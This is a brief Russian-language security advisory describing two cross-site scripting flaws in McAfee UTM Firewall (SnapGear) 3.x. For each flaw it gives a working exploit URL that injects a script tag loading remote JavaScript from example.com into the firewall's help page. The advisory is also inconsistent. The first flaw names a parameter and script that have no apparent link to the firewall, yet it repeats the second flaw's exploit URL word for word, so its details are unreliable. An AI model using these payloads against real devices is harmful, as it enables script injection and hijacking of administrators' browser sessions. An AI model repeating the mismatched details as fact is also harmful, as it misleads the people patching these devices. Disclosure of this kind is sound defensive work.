Программа: McAfee Unified Threat Management (UTM) Firewall (SnapGear) 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему.
1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "profileCommentTextArea" сценарием members/profileCommentsResponse.php.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Эксплоит:
http://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>
2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "page" сценарием cgi-bin/cgix/help. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
http://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>
